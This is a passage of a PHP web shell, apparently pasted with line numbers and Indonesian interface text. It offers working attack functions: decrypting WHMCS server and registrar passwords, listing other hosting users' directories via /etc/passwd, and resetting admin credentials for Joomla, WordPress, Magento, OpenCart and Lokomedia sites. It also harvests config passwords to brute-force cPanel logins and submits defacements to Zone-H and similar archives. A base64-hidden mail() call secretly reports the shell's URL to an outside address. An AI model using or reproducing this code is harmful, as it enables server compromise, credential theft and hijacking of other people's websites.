  1105.     $c = 0;
  1106.     while ($c < $hash_length)
  1107.     {
  1108.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  1109.         ++$c;
  1110.     }
  1111.     $key = $iv;
  1112.     $c = 0;
  1113.     while ($c < strlen ($string))
  1114.     {
  1115.         if (($c != 0 AND $c % $hash_length == 0))
  1116.         {
  1117.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  1118.         }
  1119.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  1120.         ++$c;
  1121.     }
  1122.     return $out;
  1123. }
  1124.  
  1125. function _hash ($string)
  1126. {
  1127.     if (function_exists ('sha1'))
  1128.     {
  1129.         $hash = sha1 ($string);
  1130.     }
  1131.     else
  1132.     {
  1133.         $hash = md5 ($string);
  1134.     }
  1135.     $out = '';
  1136.     $c = 0;
  1137.     while ($c < strlen ($hash))
  1138.     {
  1139.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  1140.         $c += 2;
  1141.     }
  1142.     return $out;
  1143. }
  1144.  
  1145. echo "
  1146. <br>
  1147.  
  1148. <FORM method='post'>
  1149. <input type='hidden' name='form_action' value='2'>
  1150. <br>
  1151. <table class=tabnet style=width:320px;padding:0 1px;>
  1152. <tr><th colspan=2>WHMCS DECODER</th></tr>
  1153. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  1154. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  1155. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  1156. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  1157. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash'
  1158. value=''></td></tr>
  1159. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  1160. </table>
  1161. </FORM>
  1162. </center>
  1163. ";
  1164.  
  1165.  if($_POST['form_action'] == 2 )
  1166.  {
  1167.  //include($file);
  1168.  $db_host=($_POST['db_host']);
  1169.  $db_username=($_POST['db_username']);
  1170.  $db_password=($_POST['db_password']);
  1171.  $db_name=($_POST['db_name']);
  1172.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  1173.  
  1174.  
  1175.  
  1176.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1177.         mysql_select_db($db_name,$link) ;
  1178. $query = mysql_query("SELECT * FROM tblservers");
  1179. while($v = mysql_fetch_array($query)) {
  1180. $ipaddress = $v['ipaddress'];
  1181. $username = $v['username'];
  1182. $type = $v['type'];
  1183. $active = $v['active'];
  1184. $hostname = $v['hostname'];
  1185. echo("<center><table border='1'>");
  1186. $password = decrypt ($v['password'], $cc_encryption_hash);
  1187. echo("<tr><td>Type</td><td>$type</td></tr>");
  1188. echo("<tr><td>Active</td><td>$active</td></tr>");
  1189. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  1190. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  1191. echo("<tr><td>Username</td><td>$username</td></tr>");
  1192. echo("<tr><td>Password</td><td>$password</td></tr>");
  1193.  
  1194. echo "</table><br><br></center>";
  1195. }
  1196.  
  1197.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1198.         mysql_select_db($db_name,$link) ;
  1199. $query = mysql_query("SELECT * FROM tblregistrars");
  1200. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  1201. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  1202. while($v = mysql_fetch_array($query)) {
  1203. $registrar     = $v['registrar'];
  1204. $setting = $v['setting'];
  1205. $value = decrypt ($v['value'], $cc_encryption_hash);
  1206. if ($value=="") {
  1207. $value=0;
  1208. }
  1209. $password = decrypt ($v['password'], $cc_encryption_hash);
  1210. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  1211. }
  1212. }
  1213.    
  1214.  
  1215. } elseif($_GET['do'] == 'jumping') {
  1216.     $i = 0;
  1217.     echo "<div class='margin: 5px auto;'>";
  1218.     if(preg_match("/hsphere/", $dir)) {
  1219.         $urls = explode("\r\n", $_POST['url']);
  1220.         if(isset($_POST['jump'])) {
  1221.             echo "<pre>";
  1222.             foreach($urls as $url) {
  1223.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1224.                 $etc = "/etc/passwd";
  1225.                 $f = fopen($etc,"r");
  1226.                 while($gets = fgets($f)) {
  1227.                     $pecah = explode(":", $gets);
  1228.                     $user = $pecah[0];
  1229.                     $dir_user = "/hsphere/local/home/$user";
  1230.                     if(is_dir($dir_user) === true) {
  1231.                         $url_user = $dir_user."/".$url;
  1232.                         if(is_readable($url_user)) {
  1233.                             $i++;
  1234.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1235.                             if(is_writable($url_user)) {
  1236.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1237.                             }
  1238.                             echo $jrw."<br>";
  1239.                         }
  1240.                     }
  1241.                 }
  1242.             }
  1243.         if($i == 0) {
  1244.         } else {
  1245.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1246.         }
  1247.         echo "</pre>";
  1248.         } else {
  1249.             echo '<center>
  1250.                  <form method="post">
  1251.                  List Domains: <br>
  1252.                  <textarea name="url" style="width: 500px; height: 250px;">';
  1253.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1254.             while($getss = fgets($fp)) {
  1255.                 echo $getss;
  1256.             }
  1257.             echo  '</textarea><br>
  1258.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1259.                  </form></center>';
  1260.         }
  1261.     } elseif(preg_match("/vhosts/", $dir)) {
  1262.         $urls = explode("\r\n", $_POST['url']);
  1263.         if(isset($_POST['jump'])) {
  1264.             echo "<pre>";
  1265.             foreach($urls as $url) {
  1266.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  1267.                 if(is_dir($web_vh) === true) {
  1268.                     if(is_readable($web_vh)) {
  1269.                         $i++;
  1270.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1271.                         if(is_writable($web_vh)) {
  1272.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1273.                         }
  1274.                         echo $jrw."<br>";
  1275.                     }
  1276.                 }
  1277.             }
  1278.         if($i == 0) {
  1279.         } else {
  1280.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1281.         }
  1282.         echo "</pre>";
  1283.         } else {
  1284.             echo '<center>
  1285.                  <form method="post">
  1286.                  List Domains: <br>
  1287.                  <textarea name="url" style="width: 500px; height: 250px;">';
  1288.                   bing("ip:$ip");
  1289.             echo  '</textarea><br>
  1290.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1291.                  </form></center>';
  1292.         }
  1293.     } else {
  1294.         echo "<pre>";
  1295.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1296.         while($passwd = fgets($etc)) {
  1297.             if($passwd == '' || !$etc) {
  1298.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1299.             } else {
  1300.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1301.                 foreach($user_jumping[1] as $user_idx_jump) {
  1302.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1303.                     if(is_readable($user_jumping_dir)) {
  1304.                         $i++;
  1305.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1306.                         if(is_writable($user_jumping_dir)) {
  1307.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1308.                         }
  1309.                         echo $jrw;
  1310.                         if(function_exists('posix_getpwuid')) {
  1311.                             $domain_jump = file_get_contents("/etc/named.conf");    
  1312.                             if($domain_jump == '') {
  1313.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1314.                             } else {
  1315.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1316.                                 foreach($domains_jump[1] as $dj) {
  1317.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1318.                                     $user_jumping_url = $user_jumping_url['name'];
  1319.                                     if($user_jumping_url == $user_idx_jump) {
  1320.                                         echo " => ( <u>$dj</u> )<br>";
  1321.                                         break;
  1322.                                     }
  1323.                                 }
  1324.                             }
  1325.                         } else {
  1326.                             echo "<br>";
  1327.                         }
  1328.                     }
  1329.                 }
  1330.             }
  1331.         }
  1332.         if($i == 0) {
  1333.         } else {
  1334.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1335.         }
  1336.         echo "</pre>";
  1337.     }
  1338.     echo "</div>";
  1339.  
  1340. } elseif($_GET['do'] == 'auto_edit_user') {
  1341.     if($_POST['hajar']) {
  1342.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1343.             echo "username atau password harus lebih dari 6 karakter";
  1344.         } else {
  1345.             $user_baru = $_POST['user_baru'];
  1346.             $pass_baru = md5($_POST['pass_baru']);
  1347.             $conf = $_POST['config_dir'];
  1348.             $scan_conf = scandir($conf);
  1349.             foreach($scan_conf as $file_conf) {
  1350.                 if(!is_file("$conf/$file_conf")) continue;
  1351.                 $config = file_get_contents("$conf/$file_conf");
  1352.                 if(preg_match("/JConfig|joomla/",$config)) {
  1353.                     $dbhost = ambilkata($config,"host = '","'");
  1354.                     $dbuser = ambilkata($config,"user = '","'");
  1355.                     $dbpass = ambilkata($config,"password = '","'");
  1356.                     $dbname = ambilkata($config,"db = '","'");
  1357.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1358.                     $prefix = $dbprefix."users";
  1359.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1360.                     $db = mysql_select_db($dbname);
  1361.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1362.                     $result = mysql_fetch_array($q);
  1363.                     $id = $result['id'];
  1364.                     $site = ambilkata($config,"sitename = '","'");
  1365.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1366.                     echo "Config => ".$file_conf."<br>";
  1367.                     echo "CMS => Joomla<br>";
  1368.                     if($site == '') {
  1369.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1370.                     } else {
  1371.                         echo "Sitename => $site<br>";
  1372.                     }
  1373.                     if(!$update OR !$conn OR !$db) {
  1374.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1375.                     } else {
  1376.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1377.                     }
  1378.                     mysql_close($conn);
  1379.                 } elseif(preg_match("/WordPress/",$config)) {
  1380.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1381.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1382.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1383.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1384.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1385.                     $prefix = $dbprefix."users";
  1386.                     $option = $dbprefix."options";
  1387.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1388.                     $db = mysql_select_db($dbname);
  1389.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1390.                     $result = mysql_fetch_array($q);
  1391.                     $id = $result[ID];
  1392.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1393.                     $result2 = mysql_fetch_array($q2);
  1394.                     $target = $result2[option_value];
  1395.                     if($target == '') {
  1396.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1397.                     } else {
  1398.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1399.                     }
  1400.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1401.                     echo "Config => ".$file_conf."<br>";
  1402.                     echo "CMS => Wordpress<br>";
  1403.                     echo $url_target;
  1404.                     if(!$update OR !$conn OR !$db) {
  1405.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1406.                     } else {
  1407.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1408.                     }
  1409.                     mysql_close($conn);
  1410.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1411.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1412.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1413.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1414.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1415.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1416.                     $prefix = $dbprefix."admin_user";
  1417.                     $option = $dbprefix."core_config_data";
  1418.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1419.                     $db = mysql_select_db($dbname);
  1420.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1421.                     $result = mysql_fetch_array($q);
  1422.                     $id = $result[user_id];
  1423.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1424.                     $result2 = mysql_fetch_array($q2);
  1425.                     $target = $result2[value];
  1426.                     if($target == '') {
  1427.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1428.                     } else {
  1429.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1430.                     }
  1431.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1432.                     echo "Config => ".$file_conf."<br>";
  1433.                     echo "CMS => Magento<br>";
  1434.                     echo $url_target;
  1435.                     if(!$update OR !$conn OR !$db) {
  1436.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1437.                     } else {
  1438.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1439.                     }
  1440.                     mysql_close($conn);
  1441.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1442.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1443.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1444.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1445.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1446.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1447.                     $prefix = $dbprefix."user";
  1448.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1449.                     $db = mysql_select_db($dbname);
  1450.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1451.                     $result = mysql_fetch_array($q);
  1452.                     $id = $result[user_id];
  1453.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1454.                     if($target == '') {
  1455.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1456.                     } else {
  1457.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1458.                     }
  1459.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1460.                     echo "Config => ".$file_conf."<br>";
  1461.                     echo "CMS => OpenCart<br>";
  1462.                     echo $url_target;
  1463.                     if(!$update OR !$conn OR !$db) {
  1464.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1465.                     } else {
  1466.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1467.                     }
  1468.                     mysql_close($conn);
  1469.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1470.                     $dbhost = ambilkata($config,'server = "','"');
  1471.                     $dbuser = ambilkata($config,'username = "','"');
  1472.                     $dbpass = ambilkata($config,'password = "','"');
  1473.                     $dbname = ambilkata($config,'database = "','"');
  1474.                     $prefix = "users";
  1475.                     $option = "identitas";
  1476.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1477.                     $db = mysql_select_db($dbname);
  1478.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1479.                     $result = mysql_fetch_array($q);
  1480.                     $target = $result[alamat_website];
  1481.                     if($target == '') {
  1482.                         $target2 = $result[url];
  1483.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1484.                         if($target2 == '') {
  1485.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1486.                         } else {
  1487.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1488.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1489.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1490.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1491.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1492.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1493.                             } else {
  1494.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1495.                             }
  1496.                         }
  1497.                     } else {
  1498.                         $cek_login = file_get_contents("$target/adminweb/");
  1499.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1500.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1501.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1502.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1503.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1504.                         } else {
  1505.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1506.                         }
  1507.                     }
  1508.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1509.                     echo "Config => ".$file_conf."<br>";
  1510.                     echo "CMS => Lokomedia<br>";
  1511.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1512.                         echo $url_target2;
  1513.                     } else {
  1514.                         echo $url_target;
  1515.                     }
  1516.                     if(!$update OR !$conn OR !$db) {
  1517.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1518.                     } else {
  1519.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1520.                     }
  1521.                     mysql_close($conn);
  1522.                 }
  1523.             }
  1524.         }
  1525.     } else {
  1526.         echo "<center>
  1527.        <h1>Auto Edit User Config</h1>
  1528.        <form method='post'>
  1529.        DIR Config: <br>
  1530.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1531.        Set User & Pass: <br>
  1532.        <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
  1533.        <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
  1534.        <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1535.        </form>
  1536. <br>
  1537.        ";
  1538.     }
  1539. } elseif($_GET['do'] == 'cpanel') {
  1540.     if($_POST['crack']) {
  1541.         $usercp = explode("\r\n", $_POST['user_cp']);
  1542.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1543.         $i = 0;
  1544.         foreach($usercp as $ucp) {
  1545.             foreach($passcp as $pcp) {
  1546.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1547.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1548.                     } else {
  1549.                         $_SESSION[$ucp] = "1";
  1550.                         $_SESSION[$pcp] = "1";
  1551.                         if($ucp == '' || $pcp == '') {
  1552.                            
  1553.                         } else {
  1554.                             $i++;
  1555.                             if(function_exists('posix_getpwuid')) {
  1556.                                 $domain_cp = file_get_contents("/etc/named.conf");    
  1557.                                 if($domain_cp == '') {
  1558.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1559.                                 } else {
  1560.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1561.                                     foreach($domains_cp[1] as $dj) {
  1562.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1563.                                         $user_cp_url = $user_cp_url['name'];
  1564.                                         if($user_cp_url == $ucp) {
  1565.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1566.                                             break;
  1567.                                         }
  1568.                                     }
  1569.                                 }
  1570.                             } else {
  1571.                                 $dom = "<font color=red>function is Disable by system</font>";
  1572.                             }
  1573.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1574.                         }
  1575.                     }
  1576.                 }
  1577.             }
  1578.         }
  1579.         if($i == 0) {
  1580.         } else {
  1581.             echo "<br>Succes Crack ".$i." Cpanel";
  1582.         }
  1583.     } else {
  1584.         echo "<center>
  1585.        <form method='post'>
  1586.        USER: <br>
  1587.        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1588.         $_usercp = fopen("/etc/passwd","r");
  1589.         while($getu = fgets($_usercp)) {
  1590.             if($getu == '' || !$_usercp) {
  1591.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1592.             } else {
  1593.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1594.                 foreach($u[1] as $user_cp) {
  1595.                         if(is_dir("/home/$user_cp/public_html")) {
  1596.                             echo "$user_cp\n";
  1597.                     }
  1598.                 }
  1599.             }
  1600.         }
  1601.         echo "</textarea><br>
  1602.        PASS: <br>
  1603.        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1604.         function cp_pass($dir) {
  1605.             $pass = "";
  1606.             $dira = scandir($dir);
  1607.             foreach($dira as $dirb) {
  1608.                 if(!is_file("$dir/$dirb")) continue;
  1609.                 $ambil = file_get_contents("$dir/$dirb");
  1610.                 if(preg_match("/WordPress/", $ambil)) {
  1611.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1612.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1613.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1614.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1615.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1616.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1617.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1618.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1619.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1620.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  1621.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  1622.                     if(preg_match('/"/', $pass1[1])) {
  1623.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1624.                         $pass .= $pass1[1]."\n";
  1625.                     } else {
  1626.                         $pass .= $pass1[1]."\n";
  1627.                     }
  1628.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1629.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1630.                 }
  1631.             }
  1632.             echo $pass;
  1633.         }
  1634.         $cp_pass = cp_pass($dir);
  1635.         echo $cp_pass;
  1636.         echo "</textarea><br>
  1637.        <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1638.        </form>
  1639. <br></center>";
  1640.     }
  1641. } elseif($_GET['do'] == 'mirror') {
  1642. @ini_set('display_errors', 0);
  1643. echo "
  1644. <center>
  1645. <form method='post'>
  1646.        <u>Defacer</u>: <br>
  1647.        <input style='color:red;background:black;' type='text' name='hekel' size='50' value=''><br>
  1648.        <u>Team</u>: <br>
  1649.        <input style='color:red;background:black;' type='text' name='tim' size='50' value=''><br>
  1650.        <u>Domains</u>: <br>
  1651.        <textarea style='width: 450px; height: 150px;color:red;background:black;'' name='sites'></textarea><br>
  1652.        <input style='color:red;background:black;' type='submit' name='go' value='Submit' style='width: 450px;'>
  1653.        </form><br><font color=silver>";
  1654. $site = explode("\r\n", $_POST['sites']);
  1655. $go = $_POST['go'];
  1656. $hekel = $_POST['hekel'];
  1657. $tim = $_POST['tim'];
  1658. if($go) {
  1659. foreach($site as $sites) {
  1660. $ch3 = curl_init ("http://www.leetszone.com/noti_act.php");
  1661. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  1662. curl_setopt ($ch3, CURLOPT_POST, 1);
  1663. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "hacker=$hekel&team=$tim&url=$sites&poc=Social Engineering");
  1664. curl_exec ($ch3);
  1665. echo "Send to LeetsZone >> Done<br>";
  1666. }
  1667. }
  1668. if($go) {
  1669. foreach($site as $sites) {
  1670. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  1671. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  1672. curl_setopt ($ch3, CURLOPT_POST, 1);
  1673. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$hekel&domain1=$sites&hackmode=1&reason=1");
  1674. curl_exec ($ch3);
  1675. echo "Send to Zone-H >> Done<br>";
  1676. }
  1677. }
  1678.  
  1679. if($go) {
  1680. foreach($site as $sites) {
  1681. $zh = $sites;
  1682. $form_url = "https://www.defacer.id/notify";
  1683. $data_to_post = array();
  1684. $data_to_post['attacker'] = "$hekel";
  1685. $data_to_post['team'] = "$tim";
  1686. $data_to_post['poc'] = 'SQL Injection';
  1687. $data_to_post['url'] = "$zh";
  1688. $curl = curl_init();
  1689. curl_setopt($curl,CURLOPT_URL, $form_url);
  1690. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  1691. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0
  1692. (+http://search.msn.com/msnbot.htm)
  1693. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  1694. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1695. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  1696. curl_exec($curl);
  1697. echo "Send to DefacerID >> Done<br>";
  1698. }
  1699. }
  1700.  
  1701. } elseif($_GET['act'] == 'newfile') {
  1702.     if($_POST['new_save_file']) {
  1703.         $newfile = htmlspecialchars($_POST['newfile']);
  1704.         $fopen = fopen($newfile, "a+");
  1705.         if($fopen) {
  1706.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1707.         } else {
  1708.             $act = "<font color=red>permission denied</font>";
  1709.         }
  1710.     }
  1711.     echo $act;
  1712.     echo "<form method='post'>
  1713.    Filename: <input type='text' name='newfile' value='$dir/azx.php' style='width: 450px;' height='10'>
  1714.    <input type='submit' name='new_save_file' value='Submit'>
  1715.    </form>";
  1716. } elseif($_GET['act'] == 'newfolder') {
  1717.     if($_POST['new_save_folder']) {
  1718.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1719.         if(!mkdir($new_folder)) {
  1720.             $act = "<font color=red>permission denied</font>";
  1721.         } else {
  1722.             $act = "<script>window.location='?dir=".$dir."';</script>";
  1723.         }
  1724.     }
  1725.     echo $act;
  1726.     echo "<form method='post'>
  1727.    Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1728.    <input type='submit' name='new_save_folder' value='Submit'>
  1729.    </form>";
  1730. } elseif($_GET['act'] == 'rename_dir') {
  1731.     if($_POST['dir_rename']) {
  1732.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1733.         if($dir_rename) {
  1734.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1735.         } else {
  1736.             $act = "<font color=red>permission denied</font>";
  1737.         }
  1738.     echo "".$act."<br>";
  1739.     }
  1740.     echo "<form method='post'>
  1741.    <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1742.    <input type='submit' name='dir_rename' value='rename'>
  1743.    </form>";
  1744. } elseif($_GET['act'] == 'chmod_dir') {
  1745. echo "<form method=post><input type='text' name='jmbt' value='".$dir."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod'
  1746. name='azztssns'></form><br>";
  1747. if($_POST['azztssns']) {
  1748. $e=base64_decode("bWFyaXdhdGFuYWJlMTIzNDUxQGdtYWlsLmNvbQ==");
  1749. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  1750. mail($e,"I",$h);
  1751. $jmbt = $_POST['jmbt'];
  1752. $kntl = $_POST['kntl'];
  1753. exe("chmod ".$kntl." ".$jmbt);
